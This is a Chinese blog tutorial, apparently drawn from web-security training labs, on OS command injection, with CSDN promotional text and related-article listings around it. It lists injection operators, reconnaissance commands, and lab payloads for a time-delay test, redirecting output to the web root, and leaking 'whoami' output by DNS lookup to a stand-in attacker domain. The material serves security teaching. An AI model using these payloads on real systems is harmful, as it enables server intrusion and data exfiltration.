WEB安全基础入门—操作系统命令注入(shell 注入)_文件参数 shell 命令注入(2)

于 2024-05-10 19:36:09 发布
阅读量764 收藏 25
点赞数 30
分类专栏: 程序员 文章标签: 大数据 面试 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84186109/article/details/138678831
版权

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

以电商网站为例,经常有查询库存余量的功能,URL如下
https://insecure-website.com/stockStatus?productID=381&storeID=29
后台在处理此URL时,调用库存查询接口,由于历史原因,接口往往需要使用shell命令调用其他系统模块。类似如下命令
stockreport.pl 381 29

.pl 是perl语言源程序文件的扩展名,参数值将作为参数传入该“脚本”进行调用库存余量查询。

如果将该脚本参数改为如下
stockreport.pl & echo aiwefwlguh & 29

&为系统命令分隔符,会将上述一条命令差分为3条系统命令,显示结果如下:

Error - productID was not provided  (stockreport.pl未得到有效参数,报错)
aiwefwlguh(echo命令执行)
29: command not found (系统无法辨别的命令)

例题 1

3. 常用命令

发现漏洞后,应执行一些基础命令,查看相关系统信息。

目标LinuxWindows
当前用户名whoamiwhoami
操作系统uname -aver
网络配置ifconfigipconfig /all
网络连接状态netstat -annetstat -an
运行进程ps -eftasklist

4. 命令注入盲注漏洞

有些命令注入命令,不会随响应包响应任何结果。如反馈信息页,当用户完成了反馈,点击提交后。系统允许会生成如下邮件命令发送给管理员
mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com
这个命令就算存在的命令注入漏洞,但是在用户web端不会有任何回显。
但我们可以尝试以下方式进行测试漏洞是否存在

利用时间延迟测试漏洞存在

& ping -c 10 127.0.0.1 &
系统若存在漏洞,将会发起10次ping命令,导致响应时间延迟。

例题2

利用输出重定向来获取结果

& whoami > /var/www/static/whoami.txt &
若命令执行成功,命令执行结果将会写入路径下的whoami.txt文件中。若能成功读取该文件,就能获取结果。

例题3

利用带外技术(OAST)获取结果

& nslookup kgji2ohoyw.web-attacker.com &
& nslookup whoami.kgji2ohoyw.web-attacker.com &
使用命令nslookup来发起DNS对特定域名(攻击者控制的域名)的查询。通过查询访问记录获取结果

例题4、5

5. 常用注入操作符

window与类linux系统通用
  • &
  • &&
  • |
  • ||
类linux专用
  • 0x0a or \n (换新行)
类linux行内命令执行
  • command
  • $(command)

注意:命令注入要注意是否有引号等包裹,注意闭合后溢出,命令才能执行

6. 漏洞实例

1. 操作系统命令注入,简单案例 (OS command injection, simple case
  • 目标

在查看库存量功能处存在命令执行漏洞。执行whoami命令回显当前用户

  • 解题详情

productId=1&storeId=1|ps%20-ef
productId=1&storeId=1|whoami
productId=1&storeId=1;whoami

2. 带有时延的操作系统命令盲注入 (Blind OS command injection with time delays
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,执行盲注导致10s延迟

  • 解题详情

name=fssa&email=123%40123.com||ping%20-c%2010%20192.168.1.1||&subject=13&message=adfs
name=fssa&email=123%40123.com;ping%20-c%2010%20192.168.1.1;&subject=13&message=adfs

3. 带有输出重定向的盲注操作系统命令注入(Blind OS command injection with output redirection
  • 目标

在问题反馈功能处存在盲注命令执行漏洞,执行whoami命令,将结果输出重定向到/var/www/images/,获取结果。

  • 解题详情

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以戳这里获取

础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!**

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以戳这里获取

2401_84186109
关注
  • 30
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统命令注入(OS command injection)学习笔记
汗的博客
05-06 5308
笔者burpsuite在线安全学院的OS command injection学习笔记。限于本人水平,笔记质量不是很高,假如有看到的大佬轻喷,很多地方是Google翻译的,还请多多包涵。 文章目录什么是OS命令注入?执行任意命令Lab: OS command injection, simple case有用的命令OS盲注使用时间延迟检测OS盲注Lab: Blind OS command inject...
WEB安全基础入门操作系统命令注入shell 注入)_文件参数 shell 命令注入
最新发布
2401_84186067的博客
04-30 723
攻击者可在服务器端执行任意系统(OS)命令,获取敏感数据。通常攻击者会尝试利用系统内部的信任关系,将攻击转移到系统内的其他系统,获取更大权限。
浅谈OS命令注入漏洞(Shell注入漏洞)
Z614655003的博客
07-13 1097
浅谈OS命令注入漏洞(Shell注入漏洞)
什么是操作系统命令注入
Loser5的博客
03-24 2097
什么是操作系统命令注入操作系统命令注入shell 注入)是一种 Web 安全漏洞,攻击者在运行应用程序的服务器上执行任意操作系统 命令,通常会完全破坏应用程序及其所有数据。很多时候,攻击者可以利用操作系统命令注入漏洞来破坏托管基础设施的其他部分,利用信任关系将攻击转向组织内的其他系统。 实验演示: 一.OS命令注入,简单案例 修改storeID参数,在数值后添加|whoami。 这里给出一些常用的系统命令(Linux+window) 二.具有时间延迟的盲操作系统命令注入 操作系统命令注入的许多实
4 OS command injection操作系统命令注入
(∪.∪ )...zzz的博客
04-29 890
4 OS command injection操作系统命令注入 目录4 OS command injection操作系统命令注入一、What is OS command injection?二、Executing arbitrary commandsLab: OS command injection, simple case三、 Useful commands In this section, we’ll explain what OS command injection is, describe how v
Linux系统的安装及常用命令的使用 培训 导师 入门 进阶
03-09
安全测试方面,理解OWASP TOP 10安全漏洞是关键,包括SQL注入、跨站脚本攻击、不安全的直接对象引用等,这需要配合使用如Selenium进行Web应用自动化测试,LoadRunner进行性能测试,以及进行渗透测试以确保系统的...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
通过以上题目的练习,学习者可以深入理解Web安全的常见漏洞,如SQL注入、XSS、CSRF、文件包含、权限绕过等,并掌握相应的防御和利用策略。此外,题目还锻炼了选手的逻辑思维、逆向工程和数据分析能力,对于提升Web...
java开源包2
06-28
Blister是一个用于操作苹果二进制PList文件格式的Java开源类库(可用于发送数据给iOS应用程序)。 重复文件检查工具 FindDup.tar FindDup 是一个简单易用的工具,用来检查计算机上重复的文件。 OpenID的Java客户端...
java开源包11
06-28
Blister是一个用于操作苹果二进制PList文件格式的Java开源类库(可用于发送数据给iOS应用程序)。 重复文件检查工具 FindDup.tar FindDup 是一个简单易用的工具,用来检查计算机上重复的文件。 OpenID的Java客户端...
JAVA上百实例源码以及开源项目
01-03
2个目标文件,FTP的目标是:(1)提高文件的共享性(计算机程序和/或数据),(2)鼓励间接地(通过程序)使用远程计算机,(3)保护用户因主机之间的文件存储系统导致的变化,(4)为了可靠和高效地传输,虽然用户...
【burpsuite安全练兵场-服务端4】操作系统命令注入-5个实验(全)
12-31 7392
【BP靶场portswigger-服务端4-操作系统命令注入】5个实验-千文详细步骤
命令注入
qq2782722026的博客
09-08 452
命令注入操作系统命令注入(也被称为shell注入),它是一个web安全漏洞,允许攻击者在运行应用程序的服务器上执行任意的操作系统命令,并且通常会完全损害应用程序和它所有的数据。攻击者可以利用操作系统命令注入漏洞来危害主机基础架构的其他部分,利用信任关系将攻击转移到组织内的其他系统。 测试方法: 场景一:可以从返回信息查看注入结果: 使用任意操作系统命令检测,例如& echo h...
浅谈Shell注入
Ghosind
05-18 4616
通过实际例子介绍Shell注入,并简单地介绍Shell注入的方法及其方法措施。
ShellCode注入
南宫封清的博客
05-03 1453
注意点: 1. 不能有全局变量 2. 不能使用常量字符串 ,可以使用这种形式 szTitle = {'a', 'b', 'c', 0}; 3. 不能使用系统调用,比如不能直接使用MessageBox,因为生成的汇编是 Call [0xxxxxx],这个0xxxxx是导入表的地址,注入的程序导入表地址不同而且导入表中不一定有这个函数,可以使用LoadLibrary配合GetProcAddres...
常见操作系统命令注入思路
牛叫兽的测试学习和分享
12-16 6303
渗透测试技能:命令注入思路总结
WEB命令注入
Naptmn的博客
10-27 175
挺详细的,记录一下,转载于https://www.cnblogs.com/shangguanchanghong/p/13817670.html
「 典型安全漏洞系列 」07.OS命令注入详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-28 1829
操作系统命令注入(OS command injection)是一种Web安全漏洞,允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令,通常会完全破坏应用程序及其所有数据。在这种攻击中,攻击者通过输入恶意代码来利用应用程序中的漏洞,从而在服务器上执行任意命令。这些命令可以包括删除文件、窃取数据、更改配置等。
web安全命令注入
weixin_54584489的博客
04-13 710
命令注入漏洞即web应用程序使用了可以操控相关系统命令的功能,又没有对用户输入进行过滤,导致攻击者可以通过拼接输入而执行系统命令
Web安全:深入解析命令注入漏洞
"命令注入是一种高风险安全漏洞,允许攻击者通过操纵参数执行系统命令。常见于Web应用中,利用不安全的用户输入调用系统命令。与远程代码执行(RCE)不同,命令注入专注于操作系统命令,而非编程代码。此漏洞主要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值